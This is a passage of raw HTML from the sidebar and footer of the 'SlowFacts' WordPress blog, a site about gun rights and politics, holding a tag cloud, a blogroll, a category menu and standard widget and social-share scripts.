(12 items)">Emily MIller</a> <a href="https://slowfacts.wordpress.com/tag/energy/" class="tag-cloud-link tag-link-1212 tag-link-position-19" style="font-size: 8pt;" aria-label="energy (2 items)">energy</a> <a href="https://slowfacts.wordpress.com/tag/environment/" class="tag-cloud-link tag-link-184 tag-link-position-20" style="font-size: 9.3333333333333pt;" aria-label="environment (4 items)">environment</a> <a href="https://slowfacts.wordpress.com/tag/eric-andersen/" class="tag-cloud-link tag-link-2155987 tag-link-position-21" style="font-size: 8pt;" aria-label="Eric Andersen (2 items)">Eric Andersen</a> <a href="https://slowfacts.wordpress.com/tag/family/" class="tag-cloud-link tag-link-406 tag-link-position-22" style="font-size: 8.7272727272727pt;" aria-label="family (3 items)">family</a> <a href="https://slowfacts.wordpress.com/tag/faster/" class="tag-cloud-link tag-link-161140 tag-link-position-23" style="font-size: 16.060606060606pt;" aria-label="FASTER (64 items)">FASTER</a> <a href="https://slowfacts.wordpress.com/tag/first-aid-training/" class="tag-cloud-link tag-link-7794575 tag-link-position-24" style="font-size: 9.8181818181818pt;" aria-label="first aid training (5 items)">first aid training</a> <a href="https://slowfacts.wordpress.com/tag/front-sight/" class="tag-cloud-link tag-link-1308809 tag-link-position-25" style="font-size: 8pt;" aria-label="Front Sight (2 items)">Front Sight</a> <a href="https://slowfacts.wordpress.com/tag/government/" class="tag-cloud-link tag-link-2311 tag-link-position-26" style="font-size: 20.484848484848pt;" aria-label="government (343 items)">government</a> <a href="https://slowfacts.wordpress.com/tag/gratitude/" class="tag-cloud-link tag-link-5411 tag-link-position-27" style="font-size: 16.848484848485pt;" aria-label="Gratitude (86 items)">Gratitude</a> <a href="https://slowfacts.wordpress.com/tag/grpc/" class="tag-cloud-link tag-link-19676958 tag-link-position-28" style="font-size: 9.8181818181818pt;" aria-label="GRPC (5 items)">GRPC</a> <a href="https://slowfacts.wordpress.com/tag/gun-control/" class="tag-cloud-link tag-link-4761 tag-link-position-29" style="font-size: 20.848484848485pt;" aria-label="gun control (401 items)">gun control</a> <a href="https://slowfacts.wordpress.com/tag/gun-culture/" class="tag-cloud-link tag-link-325096 tag-link-position-30" style="font-size: 16.909090909091pt;" aria-label="gun culture (88 items)">gun culture</a> <a href="https://slowfacts.wordpress.com/tag/gun-owners/" class="tag-cloud-link tag-link-880839 tag-link-position-31" style="font-size: 8.7272727272727pt;" aria-label="gun owners (3 items)">gun owners</a> <a href="https://slowfacts.wordpress.com/tag/gun-prohibition/" class="tag-cloud-link tag-link-13977193 tag-link-position-32" style="font-size: 8pt;" aria-label="gun prohibition (2 items)">gun prohibition</a> <a href="https://slowfacts.wordpress.com/tag/gun-rights-policy-conference/" class="tag-cloud-link tag-link-25297887 tag-link-position-33" style="font-size: 8pt;" aria-label="Gun Rights Policy Conference (2 items)">Gun Rights Policy Conference</a> <a href="https://slowfacts.wordpress.com/tag/heroes/" class="tag-cloud-link tag-link-37610 tag-link-position-34" style="font-size: 12.727272727273pt;" aria-label="heroes (17 items)">heroes</a> <a href="https://slowfacts.wordpress.com/tag/history/" class="tag-cloud-link tag-link-678 tag-link-position-35" style="font-size: 13.636363636364pt;" aria-label="history (25 items)">history</a> <a href="https://slowfacts.wordpress.com/tag/hr-822/" class="tag-cloud-link tag-link-52090309 tag-link-position-36" style="font-size: 8pt;" aria-label="HR 822 (2 items)">HR 822</a> <a href="https://slowfacts.wordpress.com/tag/human-nature/" class="tag-cloud-link tag-link-10949 tag-link-position-37" style="font-size: 19.333333333333pt;" aria-label="human nature (225 items)">human nature</a> <a href="https://slowfacts.wordpress.com/tag/humor/" class="tag-cloud-link tag-link-376 tag-link-position-38" style="font-size: 18.060606060606pt;" aria-label="humor (137 items)">humor</a> <a href="https://slowfacts.wordpress.com/tag/intelligence/" class="tag-cloud-link tag-link-14066 tag-link-position-39" style="font-size: 10.545454545455pt;" aria-label="intelligence (7 items)">intelligence</a> <a href="https://slowfacts.wordpress.com/tag/invention/" class="tag-cloud-link tag-link-21774 tag-link-position-40" style="font-size: 13.575757575758pt;" aria-label="invention (24 items)">invention</a> <a href="https://slowfacts.wordpress.com/tag/kenn-blanchard/" class="tag-cloud-link tag-link-9688721 tag-link-position-41" style="font-size: 8.7272727272727pt;" aria-label="Kenn Blanchard (3 items)">Kenn Blanchard</a> <a href="https://slowfacts.wordpress.com/tag/law/" class="tag-cloud-link tag-link-2054 tag-link-position-42" style="font-size: 14.060606060606pt;" aria-label="law (29 items)">law</a> <a href="https://slowfacts.wordpress.com/tag/law-enforcement/" class="tag-cloud-link tag-link-46227 tag-link-position-43" style="font-size: 13.333333333333pt;" aria-label="Law Enforcement (22 items)">Law Enforcement</a> <a href="https://slowfacts.wordpress.com/tag/laws-for-them/" class="tag-cloud-link tag-link-185196397 tag-link-position-44" style="font-size: 14.666666666667pt;" aria-label="Laws for Them (37 items)">Laws for Them</a> <a href="https://slowfacts.wordpress.com/tag/lftr/" class="tag-cloud-link tag-link-10107477 tag-link-position-45" style="font-size: 9.8181818181818pt;" aria-label="LFTR (5 items)">LFTR</a> <a href="https://slowfacts.wordpress.com/tag/liberty/" class="tag-cloud-link tag-link-13054 tag-link-position-46" style="font-size: 20.060606060606pt;" aria-label="liberty (295 items)">liberty</a> <a href="https://slowfacts.wordpress.com/tag/luddites/" class="tag-cloud-link tag-link-727070 tag-link-position-47" style="font-size: 11.151515151515pt;" aria-label="Luddites (9 items)">Luddites</a> <a href="https://slowfacts.wordpress.com/tag/nature/" class="tag-cloud-link tag-link-1099 tag-link-position-48" style="font-size: 11.151515151515pt;" aria-label="nature (9 items)">nature</a> <a href="https://slowfacts.wordpress.com/tag/new-jersey/" class="tag-cloud-link tag-link-22720 tag-link-position-49" style="font-size: 8.7272727272727pt;" aria-label="New Jersey (3 items)">New Jersey</a> <a href="https://slowfacts.wordpress.com/tag/news-media/" class="tag-cloud-link tag-link-3996 tag-link-position-50" style="font-size: 18.848484848485pt;" aria-label="news media (186 items)">news media</a> <a href="https://slowfacts.wordpress.com/tag/nuclear-power-2/" class="tag-cloud-link tag-link-35487136 tag-link-position-51" style="font-size: 11.818181818182pt;" aria-label="nuclear power (12 items)">nuclear power</a> <a href="https://slowfacts.wordpress.com/tag/politics/" class="tag-cloud-link tag-link-398 tag-link-position-52" style="font-size: 22pt;" aria-label="politics (612 items)">politics</a> <a href="https://slowfacts.wordpress.com/tag/politics-and-guns-podcast/" class="tag-cloud-link tag-link-160408918 tag-link-position-53" style="font-size: 12.727272727273pt;" aria-label="Politics and Guns Podcast (17 items)">Politics and Guns Podcast</a> <a href="https://slowfacts.wordpress.com/tag/prohibition/" class="tag-cloud-link tag-link-164162 tag-link-position-54" style="font-size: 20.121212121212pt;" aria-label="prohibition (303 items)">prohibition</a> <a href="https://slowfacts.wordpress.com/tag/project-veritas/" class="tag-cloud-link tag-link-43372660 tag-link-position-55" style="font-size: 8.7272727272727pt;" aria-label="Project Veritas (3 items)">Project Veritas</a> <a href="https://slowfacts.wordpress.com/tag/public-choice/" class="tag-cloud-link tag-link-219230 tag-link-position-56" style="font-size: 9.3333333333333pt;" aria-label="public choice (4 items)">public choice</a> <a href="https://slowfacts.wordpress.com/tag/public-choice-theory/" class="tag-cloud-link tag-link-1756170 tag-link-position-57" style="font-size: 11.151515151515pt;" aria-label="public choice theory (9 items)">public choice theory</a> <a href="https://slowfacts.wordpress.com/tag/public-unions/" class="tag-cloud-link tag-link-20394405 tag-link-position-58" style="font-size: 15.757575757576pt;" aria-label="Public Unions (56 items)">Public Unions</a> <a href="https://slowfacts.wordpress.com/tag/public-violence/" class="tag-cloud-link tag-link-20722685 tag-link-position-59" style="font-size: 16.727272727273pt;" aria-label="Public Violence (83 items)">Public Violence</a> <a href="https://slowfacts.wordpress.com/tag/quote-of-the-day/" class="tag-cloud-link tag-link-18129 tag-link-position-60" style="font-size: 12.727272727273pt;" aria-label="quote of the day (17 items)">quote of the day</a> <a href="https://slowfacts.wordpress.com/tag/racism/" class="tag-cloud-link tag-link-13443 tag-link-position-61" style="font-size: 12.969696969697pt;" aria-label="racism (19 items)">racism</a> <a href="https://slowfacts.wordpress.com/tag/religion/" class="tag-cloud-link tag-link-116 tag-link-position-62" style="font-size: 9.3333333333333pt;" aria-label="religion (4 items)">religion</a> <a href="https://slowfacts.wordpress.com/tag/san-diego/" class="tag-cloud-link tag-link-5690 tag-link-position-63" style="font-size: 14.606060606061pt;" aria-label="San Diego (36 items)">San Diego</a> <a href="https://slowfacts.wordpress.com/tag/second-amendment/" class="tag-cloud-link tag-link-102988 tag-link-position-64" style="font-size: 18.181818181818pt;" aria-label="second amendment (144 items)">second amendment</a> <a href="https://slowfacts.wordpress.com/tag/self-defense/" class="tag-cloud-link tag-link-32809 tag-link-position-65" style="font-size: 20.666666666667pt;" aria-label="self defense (371 items)">self defense</a> <a href="https://slowfacts.wordpress.com/tag/shooting/" class="tag-cloud-link tag-link-41243 tag-link-position-66" style="font-size: 10.545454545455pt;" aria-label="shooting (7 items)">shooting</a> <a href="https://slowfacts.wordpress.com/tag/smaller-government/" class="tag-cloud-link tag-link-2097542 tag-link-position-67" style="font-size: 18.484848484848pt;" aria-label="smaller government (163 items)">smaller government</a> <a href="https://slowfacts.wordpress.com/tag/sport-shooting/" class="tag-cloud-link tag-link-10715587 tag-link-position-68" style="font-size: 14.787878787879pt;" aria-label="sport shooting (39 items)">sport shooting</a> <a href="https://slowfacts.wordpress.com/tag/state-government/" class="tag-cloud-link tag-link-225147 tag-link-position-69" style="font-size: 16pt;" aria-label="State Government (62 items)">State Government</a> <a href="https://slowfacts.wordpress.com/tag/thorium/" class="tag-cloud-link tag-link-1048884 tag-link-position-70" style="font-size: 10.242424242424pt;" aria-label="Thorium (6 items)">Thorium</a> <a href="https://slowfacts.wordpress.com/tag/travel/" class="tag-cloud-link tag-link-200 tag-link-position-71" style="font-size: 8pt;" aria-label="travel (2 items)">travel</a> <a href="https://slowfacts.wordpress.com/tag/us-debt/" class="tag-cloud-link tag-link-769041 tag-link-position-72" style="font-size: 14.363636363636pt;" aria-label="US debt (33 items)">US debt</a> <a href="https://slowfacts.wordpress.com/tag/volunteerinsm/" class="tag-cloud-link tag-link-57438206 tag-link-position-73" style="font-size: 12.242424242424pt;" aria-label="volunteerinsm (14 items)">volunteerinsm</a> <a href="https://slowfacts.wordpress.com/tag/washington-navy-yard/" class="tag-cloud-link tag-link-5136147 tag-link-position-74" style="font-size: 8pt;" aria-label="washington navy yard (2 items)">washington navy yard</a> <a href="https://slowfacts.wordpress.com/tag/wonder/" class="tag-cloud-link tag-link-15146 tag-link-position-75" style="font-size: 12.363636363636pt;" aria-label="wonder (15 items)">wonder</a></div></li><li id="linkcat-1356" class="widget widget_links"><h2 class="widgettitle">Blogroll</h2> <ul class='xoxo blogroll'> <li><a href="https://ammo.com/" title="Ammunition and freedom">Ammo.com</a></li> <li><a href="http://wideawakechristian.blogspot.com/" title="Doug Evans blog of praise">Asleep No More</a></li> <li><a href="http://www.buildingshooters.com/Building-Shooters-Blog.html" title="Instruction within the bounds of science- Dusty Salomon">Building Shooters</a></li> <li><a href="http://cocivilliberties.org/faster/" title="Put first responders in Colorado schools">Coloradans for Civil Liberties- FASTER</a></li> <li><a href="http://www.corneredcat.com/scratching-post/" title="Kathy Jackson&#8217;s blog">Cornered Cat</a></li> <li><a href="http://www.drgo.us/" title="pro-rights doctors">Doctors for Responsible Gun Ownership</a></li> <li><a href="http://extranosalley.com/" title="A guns and numbers blog by Stranger">Extrano&#039;s Alley</a></li> <li><a href="https://flyoverpress.wordpress.com/" title="Just you usual daily libertain magazine">FlyoverPress</a></li> <li><a href="https://maddmedic.wordpress.com/" title="Out if his mind">Freedom is Just Another Word- by the Mad Medic</a></li> <li><a href="http://frontsightpress.com/" title="Words of wisdom from Tiffany Johnson, lawyer and firearms trainer.">Front Sight Press</a></li> <li><a href="http://goodhillpress.blogspot.com/" title="Liston Matthews Blog">Good Hill Press</a></li> <li><a href="https://gunculture2point0.wordpress.com/" title="Dr. David Yamane&#8217;s blog on contemporary gun culture">Gun Culture 2.0</a></li> <li><a href="http://gunfreezone.net" title="blog by Miguel Gonzalez">Gun Free Zone</a></li> <li><a href="http://gunfreedomradio.com/gun-freedom-radio-blog/" title="Cheryl Todd&#8217;s blog">Gun Freedom Radio Blog</a></li> <li><a href="http://jpfo.org">Jews for the Preservation of Firearms Ownership</a></li> <li><a href="http://legalinsurrection.com/" title="Conservative legal commentary">Legal Insurrection</a></li> <li><a href="https://maddmedic.wordpress.com/" title="Freedom is just another word">Mad Medic</a></li> <li><a href="http://mygunculture.com/" title="Tom McHale">My Gun Culture</a></li> <li><a href="http://onlygunsandmoney.blogspot.com/" title="John Richardson">No Lawyers – Only Guns and Money</a></li> <li><a href="http://politicsandguns.com/" title="Paul Lathrop’s Podcast about politics and guns">Polite Society Podcast</a></li> <li><a href="http://www.selfdefensegunstories.com/" title="civilian self-defense">Self Defense Gun Stories Podcast</a></li> <li><a href="http://www.pagunblog.com/" title="The right of the citizens to bear arms in defense of themselves and the State shall not be questioned.">Shall Not Be Questioned</a></li> <li><a href="http://sultanknish.blogspot.com/" title="A blog by journalist Daniel Greenfield">Sultan Knish</a></li> <li><a href="http://michaelbane.blogspot.com/2013/12/a-frightening-trip-to-grocery-store.html" title="Michael Bane">The Michael Bane Blog</a></li> <li><a href="http://politicsandguns.com" rel="colleague" title="Civilian Self-Defense">The Polite Society Podcast</a></li> <li><a href="http://waronguns.blogspot.com/" title="David Codrea">The War on Guns</a></li> <li><a href="http://waronguns.blogspot.com/" title="David Codrea&#8217;s The War on Guns">The War on Guns</a></li> <li><a href="http://wattsupwiththat.com/" title="Anthony Watts climate blog">Watts Up With That?</a></li> </ul> </li> <li id="categories-4" class="widget widget_categories"><h2 class="widgettitle">Categories</h2><form action="https://slowfacts.wordpress.com" method="get"><label class="screen-reader-text" for="cat">Categories</label><select name='cat' id='cat' class='postform' > <option value='-1'>Select Category</option> <option class="level-0" value="177">art</option> <option class="level-0" value="1337">California</option> <option class="level-0" value="9225547">celebrity violence</option> <option class="level-0" value="22388">corruption</option> <option class="level-0" value="1098">culture</option> <option class="level-0" value="1628170">DC government</option> <option class="level-0" value="23802506">defensive gun use</option> <option class="level-0" value="657">economics</option> <option class="level-0" value="1342">education</option> <option class="level-0" value="96120555">Emily Miller</option> <option class="level-0" value="1212">energy</option> <option class="level-0" value="184">environment</option> <option class="level-0" value="406">family</option> <option class="level-0" value="161140">FASTER</option> <option class="level-0" value="148544">government corruption</option> <option class="level-0" value="34622015">gratitude</option> <option class="level-0" value="19676958">GRPC</option> <option class="level-0" value="4761">gun control</option> <option class="level-0" value="325096">gun culture</option> <option class="level-0" value="37610">heroes</option> <option class="level-0" value="678">history</option> <option class="level-0" value="10949">human nature</option> <option class="level-0" value="376">humor</option> <option class="level-0" value="21774">invention</option> <option class="level-0" value="9688721">Kenn Blanchard</option> <option class="level-0" value="35134845">law enforcement</option> <option class="level-0" value="186238121">laws for them</option> <option class="level-0" value="13054">liberty</option> <option class="level-0" value="1099">nature</option> <option class="level-0" value="3996">news media</option> <option class="level-0" value="40221">Nuclear Power</option> <option class="level-0" value="398">politics</option> <option class="level-0" value="160408918">Politics and Guns Podcast</option> <option class="level-0" value="164162">prohibition</option> <option class="level-0" value="1756170">public choice theory</option> <option class="level-0" value="1250180">public debt</option> <option class="level-0" value="20722685">Public Violence</option> <option class="level-0" value="18129">quote of the day</option> <option class="level-0" value="13443">racism</option> <option class="level-0" value="116">religion</option> <option class="level-0" value="5690">San Diego</option> <option class="level-0" value="102988">second amendment</option> <option class="level-0" value="32809">self defense</option> <option class="level-0" value="41243">shooting</option> <option class="level-0" value="2097542">smaller government</option> <option class="level-0" value="10715587">sport shooting</option> <option class="level-0" value="1">Uncategorized</option> </select> </form> <script type='text/javascript'> /* <![CDATA[ */ (function() { var dropdown = document.getElementById( "cat" ); function onCatChange() { if ( dropdown.options[ dropdown.selectedIndex ].value > 0 ) { dropdown.parentNode.submit(); } } dropdown.onchange = onCatChange; })(); /* ]]> */ </script> </li> </ul> </div><!--end sidebar--> <div id="footer"> <div class="footer-liner"> <p class="right"><a href="https://wordpress.com/?ref=footer_website">Create a free website or blog at WordPress.com.</a></p> <p></p> </div><!-- .footer-liner --> </div><!--end footer--> </div><!--end wrapper--> <script type="text/javascript"> //<![CDATA[ var infiniteScroll = JSON.parse( decodeURIComponent( '%7B%22settings%22%3A%7B%22id%22%3A%22content%22%2C%22ajaxurl%22%3A%22https%3A%5C%2F%5C%2Fslowfacts.wordpress.com%5C%2F%3Finfinity%3Dscrolling%22%2C%22type%22%3A%22scroll%22%2C%22wrapper%22%3Atrue%2C%22wrapper_class%22%3A%22infinite-wrap%22%2C%22footer%22%3Atrue%2C%22click_handle%22%3A%221%22%2C%22text%22%3A%22Older%20posts%22%2C%22totop%22%3A%22Scroll%20back%20to%20top%22%2C%22currentday%22%3A%2230.04.19%22%2C%22order%22%3A%22DESC%22%2C%22scripts%22%3A%5B%5D%2C%22styles%22%3A%5B%5D%2C%22google_analytics%22%3Afalse%2C%22offset%22%3A0%2C%22history%22%3A%7B%22host%22%3A%22slowfacts.wordpress.com%22%2C%22path%22%3A%22%5C%2Fpage%5C%2F%25d%5C%2F%22%2C%22use_trailing_slashes%22%3Atrue%2C%22parameters%22%3A%22%22%7D%2C%22query_args%22%3A%7B%22error%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A0%2C%22post_parent%22%3A%22%22%2C%22subpost%22%3A%22%22%2C%22subpost_id%22%3A%22%22%2C%22attachment%22%3A%22%22%2C%22attachment_id%22%3A0%2C%22name%22%3A%22%22%2C%22pagename%22%3A%22%22%2C%22page_id%22%3A0%2C%22second%22%3A%22%22%2C%22minute%22%3A%22%22%2C%22hour%22%3A%22%22%2C%22day%22%3A0%2C%22monthnum%22%3A0%2C%22year%22%3A0%2C%22w%22%3A0%2C%22category_name%22%3A%22%22%2C%22tag%22%3A%22%22%2C%22cat%22%3A%22%22%2C%22tag_id%22%3A%22%22%2C%22author%22%3A%22%22%2C%22author_name%22%3A%22%22%2C%22feed%22%3A%22%22%2C%22tb%22%3A%22%22%2C%22paged%22%3A0%2C%22meta_key%22%3A%22%22%2C%22meta_value%22%3A%22%22%2C%22preview%22%3A%22%22%2C%22s%22%3A%22%22%2C%22sentence%22%3A%22%22%2C%22title%22%3A%22%22%2C%22fields%22%3A%22%22%2C%22menu_order%22%3A%22%22%2C%22embed%22%3A%22%22%2C%22category__in%22%3A%5B%5D%2C%22category__not_in%22%3A%5B%5D%2C%22category__and%22%3A%5B%5D%2C%22post__in%22%3A%5B%5D%2C%22post__not_in%22%3A%5B%5D%2C%22post_name__in%22%3A%5B%5D%2C%22tag__in%22%3A%5B%5D%2C%22tag__not_in%22%3A%5B%5D%2C%22tag__and%22%3A%5B%5D%2C%22tag_slug__in%22%3A%5B%5D%2C%22tag_slug__and%22%3A%5B%5D%2C%22post_parent__in%22%3A%5B%5D%2C%22post_parent__not_in%22%3A%5B%5D%2C%22author__in%22%3A%5B%5D%2C%22author__not_in%22%3A%5B%5D%2C%22posts_per_page%22%3A7%2C%22ignore_sticky_posts%22%3Afalse%2C%22suppress_filters%22%3Afalse%2C%22cache_results%22%3Afalse%2C%22update_post_term_cache%22%3Atrue%2C%22lazy_load_term_meta%22%3Atrue%2C%22update_post_meta_cache%22%3Atrue%2C%22post_type%22%3A%22%22%2C%22nopaging%22%3Afalse%2C%22comments_per_page%22%3A%2250%22%2C%22no_found_rows%22%3Afalse%2C%22order%22%3A%22DESC%22%7D%2C%22last_post_date%22%3A%222019-04-30%2007%3A44%3A15%22%2C%22stats%22%3A%22blog%3D23064700%26v%3Dwpcom%26tz%3D-5%26user_id%3D0%26subd%3Dslowfacts%26x_pagetype%3Dinfinite%22%7D%7D' ) ); //]]> </script> <!-- --> <script type='text/javascript' src='//0.gravatar.com/js/gprofiles.js?ver=201920y'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://s1.wp.com/wp-content/mu-plugins/gravatar-hovercards/wpgroho.js?m=1380573781h'></script> <script> //initialize and attach hovercards to all gravatars jQuery( document ).ready( function( $ ) { if (typeof Gravatar === "undefined"){ return; } if ( typeof Gravatar.init !== "function" ) { return; } Gravatar.profile_cb = function( hash, id ) { WPGroHo.syncProfileData( hash, id ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wp-admin-bar-my-account' ); }); </script> <div style="display:none"> </div> <script type='text/javascript'> /* <![CDATA[ */ var HighlanderComments = {"loggingInText":"Logging In\u2026","submittingText":"Posting Comment\u2026","postCommentText":"Post Comment","connectingToText":"Connecting to %s","commentingAsText":"%1$s: You are commenting using your %2$s account.","logoutText":"Log Out","loginText":"Log In","connectURL":"https:\/\/slowfacts.wordpress.com\/public.api\/connect\/?action=request","logoutURL":"https:\/\/slowfacts.wordpress.com\/wp-login.php?action=logout&_wpnonce=b319ed9855","homeURL":"https:\/\/slowfacts.wordpress.com\/","postID":"15514","gravDefault":"identicon","enterACommentError":"Please enter a comment","enterEmailError":"Please enter your email address here","invalidEmailError":"Invalid email address","enterAuthorError":"Please enter your name here","gravatarFromEmail":"This picture will show whenever you leave a comment. Click to customize it.","logInToExternalAccount":"Log in to use details from one of these accounts.","change":"Change","changeAccount":"Change Account","comment_registration":"","userIsLoggedIn":"","isJetpack":"","text_direction":"ltr"}; /* ]]> */ </script> <script type='text/javascript' src='https://s2.wp.com/_static/??/wp-content/js/jquery/jquery.autoresize.js,/wp-content/mu-plugins/highlander-comments/script.js?m=1551752381j'></script> <div id="infinite-footer"> <div class="container"> <div class="blog-info"> <a id="infinity-blog-title" href="https://slowfacts.wordpress.com/" rel="home"> SlowFacts </a> </div> <div class="blog-credits"> <a href="https://wordpress.com/?ref=footer_blog">Blog at WordPress.com.</a> </div> </div> </div><!-- #infinite-footer --> <script type="text/javascript"> window.WPCOM_sharing_counts = {"https:\/\/slowfacts.wordpress.com\/2019\/05\/14\/guns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it\/":15514,"https:\/\/slowfacts.wordpress.com\/2019\/05\/13\/gun-control-failed-again-in-denver-mass-murderers-dont-obey-the-law\/":15498,"https:\/\/slowfacts.wordpress.com\/2019\/05\/10\/how-to-skew-the-debate-and-get-more-kids-killed\/":15486,"https:\/\/slowfacts.wordpress.com\/2019\/05\/08\/school-shootings-plastic-signs-and-synthetic-emotions\/":15482,"https:\/\/slowfacts.wordpress.com\/2019\/05\/08\/political-lies-and-the-aging-revolution\/":15472,"https:\/\/slowfacts.wordpress.com\/2019\/05\/01\/the-truth-of-socialism-on-the-little-screen\/":15463,"https:\/\/slowfacts.wordpress.com\/2019\/04\/30\/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied\/":15461}; </script> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = 'https://connect.facebook.net/en_US/sdk.js#xfbml=1&appId=249643311490&version=v2.3'; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <script> jQuery( document.body ).on( 'post-load', function() { if ( 'undefined' !== typeof FB ) { FB.XFBML.parse(); } } ); </script> <script id="tumblr-js" type="text/javascript" src="https://assets.tumblr.com/share-button.js"></script> <script type="text/javascript"> // Pinterest shared resources var s = document.createElement("script"); s.type = "text/javascript"; s.async = true; s.setAttribute('data-pin-hover', true); s.src = window.location.protocol + "//assets.pinterest.com/js/pinit.js"; var x = document.getElementsByTagName("script")[0]; x.parentNode.insertBefore(s, x); // if 'Pin it' button has 'counts' make container wider jQuery(window).load( function(){ jQuery( 'li.share-pinterest a span:visible' ).closest( '.share-pinterest' ).width( '80px' ); } ); </script> <div id="sharing_email" style="display: none;"> <form action="/" method="post"> <label for="target_email">Send to Email Address</label> <input type="email" name="target_email" id="target_email" value="" /> <label for="source_name">Your Name</label> <input type="text" name="source_name" id="source_name" value="" /> <label for="source_email">Your Email Address</label> <input type="email" name="source_email" id="source_email" value="" /> <input type="text" id="jetpack-source_f_name" name="source_f_name" class="input" value="" size="25" autocomplete="off" title="This field is for validation and should not be changed" /> <div class="g-recaptcha" data-sitekey="6LcmyE0UAAAAALID28yVNg7pFCodGaArJzHitez_" data-theme="light" data-type="image" data-tabindex="0"></div> <script type="text/javascript" src="https://www.google.com/recaptcha/api.js?hl=en" async></script> <img style="float: right; display: none" class="loading" src="https://s2.wp.com/wp-content/mu-plugins/post-flair/sharing/images/loading.gif" alt="loading" width="16" height="16" /> <input type="submit" value="Send Email" class="sharing_send" /> <a rel="nofollow" href="#cancel" class="sharing_cancel" role="button">Cancel</a> <div class="errors errors-1" style="display: none;"> Post was not sent - check your email addresses! </div> <div class="errors errors-2" style="display: none;"> Email check failed, please try again </div> <div class="errors errors-3" style="display: none;"> Sorry, your blog cannot share posts by email. </div> </form> </div> <script type="text/javascript"> jQuery( document ).ready( function() { jQuery.getScript( 'https://platform.linkedin.com/in.js?async=true', function success() { IN.init(); }); }); jQuery( document.body ).on( 'post-load', function() { if ( typeof IN != 'undefined' ) IN.parse(); }); </script> <script> // Don't use Pocket's default JS as it we need to force init new Pocket share buttons loaded via JS. function jetpack_sharing_pocket_init() { jQuery.getScript( 'https://widgets.getpocket.com/v1/j/btn.js?v=1' ); } jQuery( document ).ready( jetpack_sharing_pocket_init ); jQuery( document.body ).on( 'post-load', jetpack_sharing_pocket_init ); </script> <div id="carousel-reblog-box"> <form action="#" name="carousel-reblog"> <textarea id="carousel-reblog-content" name="carousel-reblog-content" placeholder="Add your thoughts here... (optional)"></textarea> <label for="carousel-reblog-to-blog-id" id="carousel-reblog-lblogid">Post to</label> <select name="carousel-reblog-to-blog-id" id="carousel-reblog-to-blog-id"> </select> <div class="submit"> <span class="canceltext"><a href="#" class="cancel">Cancel</a></span> <input type="submit" name="carousel-reblog-submit" class="button" id="carousel-reblog-submit" value="Reblog Post" /> <input type="hidden" id="carousel-reblog-blog-id" value="23064700" /> <input type="hidden" id="carousel-reblog-blog-url" value="https://slowfacts.wordpress.com" /> <input type="hidden" id="carousel-reblog-blog-title" value="SlowFacts" /> <input type="hidden" id="carousel-reblog-post-url" value="" /> <input type="hidden" id="carousel-reblog-post-title" value="" /> </div> <input type="hidden" id="_wpnonce" name="_wpnonce" value="b8217d2509" /><input type="hidden" name="_wp_http_referer" value="/" /> </form> <div class="arrow"></div> </div> <div class="widget widget_eu_cookie_law_widget"><div class="hide-on-button ads-active" data-hide-timeout="30" data-consent-expiration="180" id="eu-cookie-law" > <form method="post"> <input type="submit" value="Close and accept" class="accept" /> Privacy &amp; Cookies: This site uses cookies. By continuing to use this website, you agree to their use. <br /> To find out more, including how to control cookies, see here: <a href="https://automattic.com/cookies" > Cookie Policy </a> </form> </div> </div><link rel='stylesheet' id='all-css-0-3' href='https://s0.wp.com/_static/??/wp-content/mu-plugins/carousel/jetpack-carousel.css,/wp-content/mu-plugins/tiled-gallery/tiled-gallery.css?m=1524699534j&cssminify=yes' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var actionbardata = {"siteID":"23064700","siteName":"SlowFacts","siteURL":"http:\/\/slowfacts.wordpress.com","icon":"<img alt='' src='https:\/\/s2.wp.com\/i\/logo\/wpcom-gray-white.png' class='avatar avatar-50' height='50' width='50' \/>","canManageOptions":"","canCustomizeSite":"","isFollowing":"","themeSlug":"pub\/vigilance","signupURL":"https:\/\/wordpress.com\/start\/","loginURL":"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F14%2Fguns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it%2F&signup_flow=account","themeURL":"","xhrURL":"https:\/\/slowfacts.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"1c05bece34","isSingular":"","isFolded":"","isLoggedIn":"","isMobile":"","subscribeNonce":"<input type=\"hidden\" id=\"_wpnonce\" name=\"_wpnonce\" value=\"2a649aeff5\" \/>","referer":"https:\/\/slowfacts.wordpress.com\/","canFollow":"1","feedID":"1019416","statusMessage":"","customizeLink":"https:\/\/slowfacts.wordpress.com\/wp-admin\/customize.php?url=https%3A%2F%2Fslowfacts.wordpress.com%2F","i18n":{"view":"View site","follow":"Follow","following":"Following","edit":"Edit","login":"Log in","signup":"Sign up","customize":"Customize","report":"Report this content","themeInfo":"Get theme: Vigilance","shortlink":"Copy shortlink","copied":"Copied","followedText":"New posts from this site will now appear in your <a href=\"https:\/\/wordpress.com\/\">Reader<\/a>","foldBar":"Collapse this bar","unfoldBar":"Expand this bar","editSubs":"Manage subscriptions","viewReader":"View site in Reader","viewReadPost":"View post in Reader","subscribe":"Sign me up","enterEmail":"Enter your email address","followers":"Join 225 other followers","alreadyUser":"Already have a WordPress.com account? <a href=\"https:\/\/wordpress.com\/log-in?redirect_to=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F14%2Fguns-ownership-is-a-dangerous-virtue-and-we-need-to-defend-it%2F&signup_flow=account\">Log in now.<\/a>","stats":"Stats"}}; /* ]]> */ </script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = 